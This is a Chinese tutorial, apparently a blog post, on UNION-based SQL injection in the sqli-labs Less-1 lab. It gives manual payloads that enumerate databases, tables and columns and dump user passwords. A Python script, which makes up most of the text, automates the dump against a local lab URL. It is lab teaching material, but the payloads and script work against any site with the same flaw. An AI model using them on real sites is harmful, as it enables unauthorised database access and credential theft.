字符型與數字型注入所使用的 payload 有所不同（字符型需要先用 `'` 閉合原有的引號，再用 `--+` 註釋掉語句剩餘部分，`+` 在 URL 中會被解碼為 MySQL `--` 註釋所要求的空格；數字型則直接拼接即可），但整體思路大同小異，注意總結。
一、獲取字段數和可回顯位置（`order by n` 逐步增大 n，直到報錯即可確定列數；`union select 1,2,3` 中被原樣回顯到頁面的數字，就是後續可用於輸出數據的位置）:
id=1' order by 3--+
id=-1' union select 1,2,3 --+
二、獲取當前數據庫、當前用戶以及所有數據庫名
#獲取當前數據庫
id=-1' union select 1,2,database() --+
#獲取當前用戶
id=-1' union select 1,2,user() --+
#獲取所有數據庫名
id=-1' union select 1,2,group_concat(schema_name) from information_schema.schemata --+
三、獲取表名
id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
四、獲取字段名和數據
#獲取字段名
id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'--+
#獲取字段數據
id=-1' union select 1,2,group_concat(password) from security.users--+
聯合注入實現起來比較簡單，可以根據上述規則寫腳本自動獲取數據。本人也寫了一份供大家參考（目標是本機搭建的 sqli-labs Less-1，僅限在自己搭建或已獲授權的靶場上使用），代碼：
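def get_data(target_url, payload):
    """Send one injected request and scrape the echoed values from the page.

    ``payload`` is appended verbatim to ``target_url`` (it already carries the
    leading ``?id=``), so any quoting or URL-encoding is the caller's job.  The
    response body is searched with ``Password:(.+?)</``: in sqli-labs the third
    UNION column is rendered in the "Password:" slot, which is why every payload
    in this file places its data in that column.

    Returns the list of matches; an empty list when nothing matched.  (The
    original returned ``None`` in that case, which made every caller raise
    ``TypeError`` as soon as it iterated the result.)

    Raises whatever ``requests.get`` raises on connection problems.  A timeout
    is set so an unresponsive target cannot hang the tool indefinitely.
    """
    html_content = requests.get(target_url + payload, timeout=10).text
    # re.findall already returns [] for no match, so no separate guard needed.
    return re.findall(r"Password:(.+?)</", html_content)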
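def get_databse_name(target_url):
    """Print the current database and every schema visible to the DB user.

    Two UNION payloads are sent through ``get_data``: ``database()`` for the
    current schema and ``group_concat(schema_name)`` over
    ``information_schema.schemata`` for all schemas.  Results are only
    printed; nothing is returned.

    ``get_data`` may yield no matches (page layout differs, injection failed);
    ``or []`` keeps the loops from raising ``TypeError`` on a ``None`` result.
    """
    all_databse_payload = "?id=-1' union select 1,2,group_concat(schema_name) from information_schema.schemata --+"
    current_database_payload = "?id=-1' union select 1,2,database() --+"
    database_name_list = get_data(target_url, all_databse_payload) or []
    current_database = get_data(target_url, current_database_payload) or []
    print('Current database:')
    for item in current_database:
        print(item + ' ')
    print('Exist database name:')
    for item in database_name_list:
        print(item)
    print('*************************************************************************')
    print('\n')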
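def get_table_name(target_url):
    """Prompt for a schema name and print the tables it contains.

    The name read from ``input()`` is spliced into the payload as-is inside
    ``table_schema='%s'``; a value containing ``'`` will break the injected
    query, so type the bare schema name.  Output is printed only.

    ``or []`` guards against ``get_data`` returning ``None`` when the page
    carried no match, which would otherwise raise ``TypeError`` in the loop.
    """
    database_name = input('Input a database name: ')
    print("Tables name:")
    payload = "?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='%s' --+" % database_name
    table_name_list = get_data(target_url, payload) or []
    for item in table_name_list:
        print(item)
    print('*************************************************************************')
    print('\n')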
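def get_column_name(target_url):
    """Prompt for a table name and print its column names.

    Unlike the manual payload earlier on this page, the query filters only on
    ``table_name`` and not on ``table_schema``, so if several schemas contain a
    table of that name their columns are concatenated together.  The value from
    ``input()`` is inserted unquoted-as-typed inside ``table_name='%s'``.
    Output is printed only.

    ``or []`` prevents a ``TypeError`` when ``get_data`` returns ``None``.
    """
    table_name = input('Please input a table name:')
    payload = "?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='%s' --+" % table_name
    column_name_list = get_data(target_url, payload) or []
    print('Columns name list:')
    for item in column_name_list:
        print(item)
    print('*************************************************************************')
    print('\n')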
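def get_column_data(target_url):
    """Prompt for schema, table and column, then print that column's values.

    All three inputs are inserted verbatim into
    ``group_concat(<column>) from <db>.<table>``; because nothing is quoted or
    validated, the column slot also accepts an expression such as
    ``concat(username,':',password)``.  Output is printed only.

    NOTE(review): ``group_concat`` is bounded by MySQL's ``group_concat_max_len``
    (1024 bytes by default), so large tables will be silently truncated —
    confirm against the target before trusting a "complete" dump.

    ``or []`` prevents a ``TypeError`` when ``get_data`` returns ``None``.
    """
    database_name = input('Input a database name: ')
    table_name = input('Please input a table name:')
    column_name = input('Please input a column name:')
    payload = "?id=-1' union select 1,2,group_concat(%s) from %s.%s --+" % (column_name, database_name, table_name)
    column_data = get_data(target_url, payload) or []
    for item in column_data:
        print(item)
    print('*************************************************************************')
    print('\n')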
def main():
    """Run the Less-1 walk-through: databases, then tables, then column data.

    The target is hard-coded to a local sqli-labs instance.  Wall-clock time
    for the whole run is printed at the end (whole seconds only).
    """
    target_url = 'http://127.0.0.1/sqli-labs-master/Less-1/'
    started = datetime.datetime.now()
    print('+----------------------------------------Begin----------------------------------------+')
    # get_column_name is defined above but is not part of this sequence; the
    # operator is expected to already know the column to dump.
    for step in (get_databse_name, get_table_name, get_column_data):
        step(target_url)
    elapsed = (datetime.datetime.now() - started).seconds
    print('+-----------------------------------------End-----------------------------------------+')
    print('All mission completed!Cost %s seconds' % elapsed)


if __name__ == '__main__':
    main()
運行效果:
當遇到盲注類型時，頁面不再直接回顯查詢結果，上面依賴 `Password:(.+?)</` 正則提取結果的 `get_data` 就不再適用，需要改為根據頁面特徵逐字判斷（布爾盲注比較頁面內容差異，時間盲注比較響應延遲），再配合二分等方式還原數據；其餘枚舉庫名、表名、字段的流程可以繼續沿用。